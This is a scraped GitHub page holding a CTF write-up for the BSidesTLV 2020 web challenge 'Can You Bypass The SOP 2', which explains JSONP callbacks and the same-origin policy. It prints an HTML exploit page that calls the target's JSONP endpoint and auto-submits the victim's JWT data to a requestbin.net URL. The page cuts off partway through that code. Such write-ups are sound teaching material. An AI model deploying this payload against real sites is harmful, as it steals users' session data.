aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path> </svg> <span class="d-none d-sm-inline"> <strong>History</strong> </span> </a> </li> </ul> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>

<include-fragment src="/trott4425/CTF-Writeups/file-list/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202"> <a class="d-none js-permalink-shortcut" data-hotkey="y" href="/trott4425/CTF-Writeups/tree/d1339e79c3236b2a4b0803c2fb4cfc349134fb80/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202">Permalink</a>

<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> Failed to load latest commit information.

</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <a rel="nofollow" title="Go to parent directory" class="js-navigation-open d-block py-2 px-3" href="/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web"> <span class="text-bold text-center d-inline-block" style="min-width: 16px;">. .</span> </a> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>

    <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item ">
      <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;">
          <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted">
<path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path>

</svg> </div>

      <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3">
        <span class="css-truncate css-truncate-target d-block width-fit"><a class="js-navigation-open Link--primary" title="README.MD" data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/README.MD">README.MD</a></span>
      </div>

      <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" >
          <div class="Skeleton Skeleton--text col-7">&nbsp;</div>
      </div>

      <div role="gridcell" class="color-fg-muted text-right" style="width:100px;">
          <div class="Skeleton Skeleton--text">&nbsp;</div>
      </div>

    </div>
    <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item ">
      <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;">
          <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted">
<path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path>

</svg> </div>

      <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3">
        <span class="css-truncate css-truncate-target d-block width-fit"><a class="js-navigation-open Link--primary" title="callback1.PNG" data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/callback1.PNG">callback1.PNG</a></span>
      </div>

      <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" >
          <div class="Skeleton Skeleton--text col-7">&nbsp;</div>
      </div>

      <div role="gridcell" class="color-fg-muted text-right" style="width:100px;">
          <div class="Skeleton Skeleton--text">&nbsp;</div>
      </div>

    </div>
    <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item ">
      <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;">
          <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted">
<path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path>

</svg> </div>

      <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3">
        <span class="css-truncate css-truncate-target d-block width-fit"><a class="js-navigation-open Link--primary" title="callback2.PNG" data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/callback2.PNG">callback2.PNG</a></span>
      </div>

      <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" >
          <div class="Skeleton Skeleton--text col-7">&nbsp;</div>
      </div>

      <div role="gridcell" class="color-fg-muted text-right" style="width:100px;">
          <div class="Skeleton Skeleton--text">&nbsp;</div>
      </div>

    </div>
    <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item ">
      <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;">
          <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted">
<path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path>

</svg> </div>

      <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3">
        <span class="css-truncate css-truncate-target d-block width-fit"><a class="js-navigation-open Link--primary" title="flag.png" data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/flag.png">flag.png</a></span>
      </div>

      <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" >
          <div class="Skeleton Skeleton--text col-7">&nbsp;</div>
      </div>

      <div role="gridcell" class="color-fg-muted text-right" style="width:100px;">
          <div class="Skeleton Skeleton--text">&nbsp;</div>
      </div>

    </div>
    <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item ">
      <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;">
          <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted">
<path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path>

</svg> </div>

      <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3">
        <span class="css-truncate css-truncate-target d-block width-fit"><a class="js-navigation-open Link--primary" title="requestbin.PNG" data-turbo-frame="repo-content-turbo-frame" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/requestbin.PNG">requestbin.PNG</a></span>
      </div>

      <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" >
          <div class="Skeleton Skeleton--text col-7">&nbsp;</div>
      </div>

      <div role="gridcell" class="color-fg-muted text-right" style="width:100px;">
          <div class="Skeleton Skeleton--text">&nbsp;</div>
      </div>

    </div>
</div>

</div>

</include-fragment>

</div>

  <readme-toc>

  <div id="readme" class="Box MD js-code-block-container js-code-nav-container js-tagsearch-file Box--responsive"
      data-tagsearch-path="BSidesTLV-2020/web/Can You Bypass The SOP 2/README.MD"
      data-tagsearch-lang="Markdown">

    <div class="d-flex  js-sticky js-position-sticky top-0 border-top-0 border-bottom p-2 flex-items-center flex-justify-between color-bg-default rounded-top-2"  style="position: sticky; z-index: 30;" >
      <div class="d-flex flex-items-center">
          <details

data-target="readme-toc.trigger" data-menu-hydro-click="{"event_type":"repository_toc_menu.click","payload":{"target":"trigger","repository_id":276119642,"originating_url":"https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202","user_id":null}}" data-menu-hydro-click-hmac="e87ebf304a32efcbd93d00383a71ffb07d9a5cb62bb41308bb7484a6c3c662fa" class="dropdown details-reset details-overlay"

<details-menu class="SelectMenu" role="menu"> <div class="SelectMenu-modal rounded-3 mt-1" style="max-height:340px;">

  <div class="SelectMenu-list SelectMenu-list--borderless p-2" style="overscroll-behavior: contain;">
      <a role="menuitem" class="filter-item SelectMenu-item ws-normal wb-break-word line-clamp-2 py-1 text-emphasized" style="-webkit-box-orient: vertical; padding-left: 12px;" data-action="click:readme-toc#blur" data-targets="readme-toc.entries" data-hydro-click="{&quot;event_type&quot;:&quot;repository_toc_menu.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;entry&quot;,&quot;repository_id&quot;:276119642,&quot;originating_url&quot;:&quot;https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="96144f80fd3533ab47eb8e35909efb47c31d86519f8fe94c1462f33938c7cffa" href="#challenge-instructions">Challenge Instructions</a>
      <a role="menuitem" class="filter-item SelectMenu-item ws-normal wb-break-word line-clamp-2 py-1 text-emphasized" style="-webkit-box-orient: vertical; padding-left: 12px;" data-action="click:readme-toc#blur" data-targets="readme-toc.entries" data-hydro-click="{&quot;event_type&quot;:&quot;repository_toc_menu.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;entry&quot;,&quot;repository_id&quot;:276119642,&quot;originating_url&quot;:&quot;https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="96144f80fd3533ab47eb8e35909efb47c31d86519f8fe94c1462f33938c7cffa" href="#discovery">Discovery</a>
      <a role="menuitem" class="filter-item SelectMenu-item ws-normal wb-break-word line-clamp-2 py-1 text-emphasized" style="-webkit-box-orient: vertical; padding-left: 12px;" data-action="click:readme-toc#blur" data-targets="readme-toc.entries" data-hydro-click="{&quot;event_type&quot;:&quot;repository_toc_menu.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;entry&quot;,&quot;repository_id&quot;:276119642,&quot;originating_url&quot;:&quot;https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="96144f80fd3533ab47eb8e35909efb47c31d86519f8fe94c1462f33938c7cffa" href="#solution">Solution</a>
  </div>
</div>

</details-menu> </details>

        <h2 class="Box-title">
          <a href="#readme" data-view-component="true" class="Link--primary">README.MD</a>
        </h2>
      </div>
    </div>

      <div data-target="readme-toc.content" class="Box-body px-5 pb-5">
        <article class="markdown-body entry-content container-lg" itemprop="text"><h1 tabindex="-1" dir="auto"><a id="user-content-challenge-instructions" class="anchor" aria-hidden="true" href="#challenge-instructions"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a>Challenge Instructions</h1>

<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Hi Agent! Your mission is to exfiltrate data of our target, so we can catch him! Can you do it?

URL: https://can-you-bypass-the-sop.ctf.bsidestlv.com/

BOT: https://can-you-bypass-the-sop.ctf.bsidestlv.com/bot"><pre class="notranslate"><code>Hi Agent! Your mission is to exfiltrate data of our target, so we can catch him! Can you do it?

URL: https://can-you-bypass-the-sop.ctf.bsidestlv.com/

BOT: https://can-you-bypass-the-sop.ctf.bsidestlv.com/bot </code></pre></div> <h1 tabindex="-1" dir="auto"><a id="user-content-discovery" class="anchor" aria-hidden="true" href="#discovery"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a>Discovery</h1> <p dir="auto">So the first thing that I realize is that we have a BOT url. Clicking on it brings us to a page with not much going on except for a textfield for a URL and a "Browse" button. From previous CTFs, this seemed like some sort of URL click bot that was running that would navigate to whatever URL was passed it. So to make sure, I fired up a request bin and passed in the URL to the bot. Sure enough, we get a hit.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/requestbin.PNG"><img src="/trott4425/CTF-Writeups/raw/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/requestbin.PNG" alt="Test request bin" style="max-width: 100%;"></a></p> <p dir="auto">With this in mind and the fact that the challenge name uses the term SOP, we're likely looking for some XSS variation that we can store inside a link or a webpage that we can send to the BOT to gain any secrets that it may hold.</p> <p dir="auto">After navigating to the main url, we're presented with a login page. We immediately see a "JOIN AS A GUEST" button. Clicking this grants us access to a welcome screen as a guest user. After being logged in as a guest, I noticed a JWT token added to my cookie storage in my browser, <code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiZmxhZyI6IllvdSBhcmUgb24gdGhlIHJpZ2h0IHRyYWNrISIsImlhdCI6MTU5MzU1NjY3MX0.BOh06azgJcQFjPkzbYG4FnCUNsyfLniedmwXVgM9-0k</code></p> <p dir="auto">Decoding the token, we get</p> <div class="highlight highlight-source-json notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="{ "alg": "HS256", "typ": "JWT" }

{ "username": "Guest", "flag": "You are on the right track!", "iat": 1593556671 } HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), 256 secret, ) "><pre>{ <span class="pl-ent">"alg"</span>: <span class="pl-s"><span class="pl-pds">"</span>HS256<span class="pl-pds">"</span></span>, <span class="pl-ent">"typ"</span>: <span class="pl-s"><span class="pl-pds">"</span>JWT<span class="pl-pds">"</span></span> }

{ <span class="pl-ent">"username"</span>: <span class="pl-s"><span class="pl-pds">"</span>Guest<span class="pl-pds">"</span></span>, <span class="pl-ent">"flag"</span>: <span class="pl-s"><span class="pl-pds">"</span>You are on the right track!<span class="pl-pds">"</span></span>, <span class="pl-ent">"iat"</span>: <span class="pl-c1">1593556671</span> } <span class="pl-ii">HMACSHA256(</span> <span class="pl-ii">base64UrlEncode(header) + "." +</span> <span class="pl-ii">base64UrlEncode(payload),</span> <span class="pl-c1">256</span> <span class="pl-ii">secret,</span> <span class="pl-ii">) </span></pre></div> <p dir="auto">Interesting, the payload in the JWT token has a flag field. Also, the <code>SameSite</code> security flag was not set on the cookie, which means the site looks to be vulnerable to CSRF. It seems likely that if we can come up with some type of XSS, the user who clicks on our link will have their credentials passed in, even if the link was not originally from the <code>https://can-you-bypass-the-sop.ctf.bsidestlv.com</code> site.</p> <p dir="auto">Snooping some more, we find the application code in the main.js file <code>https://can-you-bypass-the-sop.ctf.bsidestlv.com/js/main.js</code>. This script file stores the JavaScript functions that are called when someone signs in or joins as a guest. The function we are particularly interested in is</p> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="function signIn() { let http = new XMLHttpRequest(); http.open('POST', 'signIn', true); http.setRequestHeader('Content-type', 'application/json'); http.onreadystatechange = function() {//Call a function when the state changes. if(http.readyState === 4 && http.status === 200) { $.ajax({ dataType: 'jsonp', jsonp: 'callback', url: '/FetchUserInfo?callback=?', success: function (data) { $("#login").html( <span class="login100-form-title p-b-70">Welcome ${data.username}!</span> <span class="login100-form-avatar"> <img src="images/avatar-01.jpg" alt="AVATAR"></span> <div class="container-login100-form-btn" style="margin-top: 20px"> <button class="login100-form-btn" id="select_div_SIGNIN" onclick="signOut()"> Sign Out </button> </div>); } }); } }; http.send(JSON.stringify({username: "Guest"})); }"><pre><span class="pl-k">function</span> <span class="pl-en">signIn</span><span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-k">let</span> <span class="pl-s1">http</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> <span class="pl-v">XMLHttpRequest</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-s1">http</span><span class="pl-kos">.</span><span class="pl-en">open</span><span class="pl-kos">(</span><span class="pl-s">'POST'</span><span class="pl-kos">,</span> <span class="pl-s">'signIn'</span><span class="pl-kos">,</span> <span class="pl-c1">true</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-s1">http</span><span class="pl-kos">.</span><span class="pl-en">setRequestHeader</span><span class="pl-kos">(</span><span class="pl-s">'Content-type'</span><span class="pl-kos">,</span> <span class="pl-s">'application/json'</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-s1">http</span><span class="pl-kos">.</span><span class="pl-en">onreadystatechange</span> <span class="pl-c1">=</span> <span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-kos">{</span><span class="pl-c">//Call a function when the state changes.</span> <span class="pl-k">if</span><span class="pl-kos">(</span><span class="pl-s1">http</span><span class="pl-kos">.</span><span class="pl-c1">readyState</span> <span class="pl-c1">===</span> <span class="pl-c1">4</span> <span class="pl-c1">&&</span> <span class="pl-s1">http</span><span class="pl-kos">.</span><span class="pl-c1">status</span> <span class="pl-c1">===</span> <span class="pl-c1">200</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-s1">$</span><span class="pl-kos">.</span><span class="pl-en">ajax</span><span class="pl-kos">(</span><span class="pl-kos">{</span> <span class="pl-c1">dataType</span>: <span class="pl-s">'jsonp'</span><span class="pl-kos">,</span> <span class="pl-c1">jsonp</span>: <span class="pl-s">'callback'</span><span class="pl-kos">,</span> <span class="pl-c1">url</span>: <span class="pl-s">'/FetchUserInfo?callback=?'</span><span class="pl-kos">,</span> <span class="pl-en">success</span>: <span class="pl-k">function</span> <span class="pl-kos">(</span><span class="pl-s1">data</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-en">$</span><span class="pl-kos">(</span><span class="pl-s">"#login"</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">html</span><span class="pl-kos">(</span> <span class="pl-s"><span class="login100-form-title p-b-70">Welcome <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">data</span><span class="pl-kos">.</span><span class="pl-c1">username</span><span class="pl-kos">}</span></span>!</span></span> <span class="pl-s"> <span class="login100-form-avatar"></span> <span class="pl-s"> <img src="images/avatar-01.jpg" alt="AVATAR"></span></span> <span class="pl-s"> <div class="container-login100-form-btn" style="margin-top: 20px"></span> <span class="pl-s"> <button class="login100-form-btn" id="select_div_SIGNIN" onclick="signOut()"></span> <span class="pl-s"> Sign Out</span> <span class="pl-s"> </button></span> <span class="pl-s"> </div></span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span> <span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span> <span class="pl-kos">}</span><span class="pl-kos">;</span> <span class="pl-s1">http</span><span class="pl-kos">.</span><span class="pl-en">send</span><span class="pl-kos">(</span><span class="pl-c1">JSON</span><span class="pl-kos">.</span><span class="pl-en">stringify</span><span class="pl-kos">(</span><span class="pl-kos">{</span><span class="pl-c1">username</span>: <span class="pl-s">"Guest"</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span></pre></div> <p dir="auto">Something that should catch your eye pretty quickly is the second AJAX request and its use of the jsonp data type. A little background on JSONP, it is a mechanism that REST endpoints employed to bypass the same-origin policy (SOP). The same-origin policy is a security mechanism that browsers and web sites use to ensure that scripts and resources that are loaded from one origin cannot access resources from another origin. This is why if you navigated to your browser's web console while on a website and start making AJAX calls to another website on a different domain, your browser would stop you, as it would be breaching the SOP.</p> <p dir="auto">Some JSONP configurations allow you to define a <code>callback</code> parameter that is a function that is defined on the client side that when the request returns, it is automatically invoked and the code is executed. Navigating to the endpoint in question, we can see exactly what is happening. First by passing in <code>callback=i_control_this</code> <a target="_blank" rel="noopener noreferrer" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/callback1.PNG"><img src="/trott4425/CTF-Writeups/raw/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/callback1.PNG" alt="callback example" style="max-width: 100%;"></a></p> <p dir="auto">and now <code>callback=with_whatever_I_want</code></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/callback2.PNG"><img src="/trott4425/CTF-Writeups/raw/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/callback2.PNG" alt="callback example 2" style="max-width: 100%;"></a></p> <p dir="auto">Hmm, the callback function is being passed the payload to our JWT token. This is the last piece to our puzzle! If we can create a function that will ingest the object being passed back to to the JSONP callback function, we can send it as a URL parameter to an endpoint that we control and log the results.</p> <p dir="auto">Lets see what we can come up with!</p> <h1 tabindex="-1" dir="auto"><a id="user-content-solution" class="anchor" aria-hidden="true" href="#solution"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a>Solution</h1> <p dir="auto">To put this all together we need 2 things.</p> <ol dir="auto"> <li> <p dir="auto">We need to set up a requestbin to catch our request that will have the stolen cookie. That is simple enough.</p> </li> <li> <p dir="auto">To deploy the XSS, we need a way to host a web page. There are several services out there or you can use your own hosted website. I used <a href="https://repl.it/" rel="nofollow">repl.it</a>, which allows you to spin up proof of concept code snippets incredibly quickly. Below is the index.html file that is served whenever someone lands on my custom hosted website.</p> </li> </ol> <div class="highlight highlight-text-html-basic notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <title>repl.it</title> <link href="style.css" rel="stylesheet" type="text/css" /> <script src="https://code.jquery.com/jquery-1.8.2.min.js"></script> </head> <body> <form action="https://requestbin.net/r/w4xs0xw4" method="GET" > <input type="hidden" name="data" value="template" id="input" /> <script> $(document).ready(function(){ $.ajax({ dataType: 'jsonp', jsonp: 'callback', url: 'https://can-you-bypass-the-sop.ctf.bsidestlv.com/FetchUserInfo?callback=?', success: function (data) { /let http = new XMLHttpRequest() http.open('POST', 'https://requestbin.net/r/w4xs0xw4', true); http.setRequestHeader('Content-type', 'application/json'); http.send(JSON.stringify(data));/ var input = document.getElementById("input"); console.log(data); input.value = data.flag; document.forms[0].submit(); } }); }); </script> </body> </html>"><pre><span class="pl-c1"><!DOCTYPE html<span class="pl-kos">></span></span> <span class="pl-kos"><</span><span class="pl-ent">html</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">head</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">meta</span> <span class="pl-c1">charset</span>="<span class="pl-s">utf-8</span>"<span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">meta</span> <span class="pl-c1">name</span>="<span class="pl-s">viewport</span>" <span class="pl-c1">content</span>="<span class="pl-s">width=device-width</span>"<span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">title</span><span class="pl-kos">></span>repl.it<span class="pl-kos"></</span><span class="pl-ent">title</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">link</span> <span class="pl-c1">href</span>="<span class="pl-s">style.css</span>" <span class="pl-c1">rel</span>="<span class="pl-s">stylesheet</span>" <span class="pl-c1">type</span>="<span class="pl-s">text/css</span>" /> <span class="pl-kos"><</span><span class="pl-ent">script</span> <span class="pl-c1">src</span>="<span class="pl-s">https://code.jquery.com/jquery-1.8.2.min.js</span>"<span class="pl-kos">></span><span class="pl-kos"></</span><span class="pl-ent">script</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">head</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">form</span> <span class="pl-c1">action</span>="<span class="pl-s">https://requestbin.net/r/w4xs0xw4</span>" <span class="pl-c1">method</span>="<span class="pl-s">GET</span>" <span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">input</span> <span 